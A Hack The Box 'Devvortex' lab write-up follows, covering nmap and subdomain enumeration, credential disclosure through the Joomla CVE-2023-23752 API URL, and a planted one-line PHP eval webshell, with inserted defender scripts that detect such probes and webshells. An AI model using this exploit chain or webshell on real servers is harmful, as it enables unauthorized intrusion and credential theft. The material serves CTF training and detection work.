Hack the Box Devvortex lab notes

After spinning up and connecting to the target, scan the address with nmap:

root@kali:~/Desktop# nmap -T4 -A -v -Pn 10.10.11.242
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-25 00:12 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:12
Completed NSE at 00:12, 0.00s elapsed
Initiating NSE at 00:12
Completed NSE at 00:12, 0.00s elapsed
Initiating NSE at 00:12
Completed NSE at 00:12, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:12
Completed Parallel DNS resolution of 1 host. at 00:12, 0.01s elapsed
Initiating SYN Stealth Scan at 00:12
Scanning 10.10.11.242 [1000 ports]
Discovered open port 22/tcp on 10.10.11.242
Discovered open port 80/tcp on 10.10.11.242
Increasing send delay for 10.10.11.242 from 0 to 5 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.11.242 from 5 to 10 due to max_successful_tryno increase to 6
Completed SYN Stealth Scan at 00:13, 48.63s elapsed (1000 total ports)
Initiating Service scan at 00:13
Scanning 2 services on 10.10.11.242
Completed Service scan at 00:13, 7.42s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.11.242
Retrying OS detection (try #2) against 10.10.11.242
Retrying OS detection (try #3) against 10.10.11.242
Initiating Traceroute at 00:14
Completed Traceroute at 00:14, 1.81s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:14
Completed Parallel DNS resolution of 2 hosts. at 00:14, 0.01s elapsed
NSE: Script scanning 10.10.11.242.
Initiating NSE at 00:14
Completed NSE at 00:14, 27.06s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 4.96s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 0.00s elapsed
Nmap scan report for 10.10.11.242
Host is up (0.50s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.000 days (since Thu Jan 25 00:14:02 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 792.32 ms 10.10.14.1
2 792.48 ms 10.10.11.242

NSE: Script Post-scanning.
Initiating NSE at 00:14
Completed NSE at 00:14, 0.00s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 0.00s elapsed
Initiating NSE at 00:14
Completed NSE at 00:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.80 seconds
Raw packets sent: 1442 (66.912KB) | Rcvd: 1303 (58.018KB)

From the scan results above, the host has ports 80 and 22 open, so start with port 80.

Trying to browse to port 80, the page does not load, so bind the IP and the domain name in the hosts file:

root@kali:~/Desktop# vim /etc/hosts 
root@kali:~/Desktop# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.242 devvortex.htb

Then revisit the same address in the browser; the page now loads normally.

Browsing the pages turns up nothing of value, so next scan the site's directories, using dirsearch:

root@kali:~/Desktop# dirsearch -u http://devvortex.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /root/Desktop/reports/http_devvortex.htb/__24-01-25_00-22-59.txt

Target: http://devvortex.htb/

[00:22:59] Starting:
[00:23:25] 301 - 178B - /js -> http://devvortex.htb/js/
[00:24:19] 200 - 7KB - /about.html
[00:25:48] 200 - 9KB - /contact.html
[00:25:53] 301 - 178B - /css -> http://devvortex.htb/css/
[00:26:43] 301 - 178B - /images -> http://devvortex.htb/images/
[00:26:43] 403 - 564B - /images/
[00:26:50] 403 - 564B - /js/

Task Completed

Next, scan for subdomains, using gobuster:

root@kali:~/Desktop# gobuster vhost -u http://devvortex.htb -w /usr/share/wordlists/amass/subdomains-top1mil-20000.txt --threads=40 --timeout=20s --append-domain

The subdomain scan finds one subdomain returning status code 200, which means it is reachable, so add this subdomain to the hosts file as well:

root@kali:~/Desktop# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.242 devvortex.htb
10.10.11.242 dev.devvortex.htb

Next, visit the subdomain site and scan it as well:

root@kali:~/Desktop# dirsearch -u http://dev.devvortex.htb

The scan reveals an administrator subdirectory; try visiting it:

This is a site running Joomla. Searching for known vulnerabilities turns up an unauthenticated access vulnerability, CVE-2023-23752.

Simply visiting http://dev.devvortex.htb/api/index.php/v1/config/application?public=true returns a username and password:
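As an added, defender-side example (not from the original writeup), here is a small Python script that scans nginx access-log lines for requests to the Joomla API config endpoint carrying the public=true parameter that CVE-2023-23752 abuses, and reports whether the server answered 200 (meaning the config was actually served). The log lines are constructed samples; the users endpoint in SENSITIVE_PATHS is an assumption that goes beyond the page, based on the same Joomla 4 API family.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample nginx access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.10.14.5 - - [25/Jan/2024:00:30:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1456 "-" "curl/8.4.0"
10.10.14.5 - - [25/Jan/2024:00:30:02 +0000] "GET /administrator/index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.10.14.7 - - [25/Jan/2024:00:31:10 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 401 312 "-" "python-requests/2.31"
192.0.2.9 - - [25/Jan/2024:00:32:00 +0000] "GET /index.php HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

# Combined log format: ip - - [timestamp] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Sensitive Joomla 4 API paths. The config path is the one on the page; the users path is an
# assumption (same API family, also exposed by the public=true bypass).
SENSITIVE_PATHS = (
    "/api/index.php/v1/config/application",
    "/api/index.php/v1/users",
)


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)
    return entry


def is_public_api_probe(entry):
    """True when the request hits a sensitive API path with the public=true bypass parameter."""
    public = entry["query"].get("public", [""])[0].lower()
    return entry["path"] in SENSITIVE_PATHS and public == "true"


def find_probes(log_text):
    """Return one finding per probing request; 'leaked' marks a 200 answer (data was served)."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_public_api_probe(entry):
            hits.append({
                "ip": entry["ip"],
                "ts": entry["ts"],
                "path": entry["path"],
                "status": entry["status"],
                "leaked": entry["status"] == 200,
            })
    return hits


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        flag = "LEAKED" if hit["leaked"] else "blocked"
        print(f"{hit['ts']} {hit['ip']} {hit['path']} -> {hit['status']} ({flag})")
```

A 200 on either path from an unauthenticated client is the signal that matters: on a patched Joomla the public=true trick yields a 401/403, so the status code separates a harmless probe from an actual disclosure.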


After logging in successfully, it looks like this:

Once inside, looking through the page options, under System there is an Administrator Templates function that allows creating files directly.

Write a one-line PHP webshell:

<?php @eval($_POST['aaa']);?>

After writing it, connect with AntSword (蚁剑).
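Added example, not part of the original writeup: a Python scanner that walks a Joomla template directory for PHP files where a code-execution sink (eval, system, and similar) is fed straight from a request superglobal, which is exactly the shape of the one-liner above. The sample tree it builds in a temp directory is constructed; the administrator/templates/atum path is an assumed Joomla 4 layout.

```python
import os
import re
import tempfile

# Code-execution sinks and request superglobals typical of minimal PHP webshells.
SINKS = r"(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)"
SUPERGLOBALS = r"\$_(?:POST|GET|REQUEST|COOKIE)"
# Sink call whose argument list contains a superglobal array access, e.g. eval($_POST['x']).
WEBSHELL_RE = re.compile(
    rf"@?\b{SINKS}\s*\(\s*[^;]*?{SUPERGLOBALS}\s*\[", re.IGNORECASE
)


def scan_file(path):
    """Return (line number, stripped line) for every line matching the webshell pattern."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        if WEBSHELL_RE.search(line):
            findings.append((lineno, line.strip()))
    return findings


def scan_tree(root, exts=(".php", ".phtml")):
    """Walk root and map each suspicious PHP file (posix-style relative path) to its findings."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                report[rel] = hits
    return report


def build_sample_tree():
    """Constructed sample: one clean template file and one planted one-liner (assumed layout)."""
    root = tempfile.mkdtemp(prefix="joomla_templates_")
    tmpl = os.path.join(root, "administrator", "templates", "atum")
    os.makedirs(tmpl)
    with open(os.path.join(tmpl, "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\ndefined('_JEXEC') or die;\necho $this->getTitle();\n")
    with open(os.path.join(tmpl, "error.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php @eval($_POST['aaa']);?>\n")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for rel_path, hits in scan_tree(sample_root).items():
        for lineno, text in hits:
            print(f"{rel_path}:{lineno}: {text}")
```

Pattern matching of this kind catches the plain one-liner and its close variants; obfuscated shells (base64, string concatenation, variable functions) need a different check, so in practice pair it with file-integrity monitoring of the template directories, which should never change outside a deployment.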

By browsing the directory files, the configuration file turns out to contain the database username and password, and the database is MySQL.

Note that the database type to select here is MySQLi.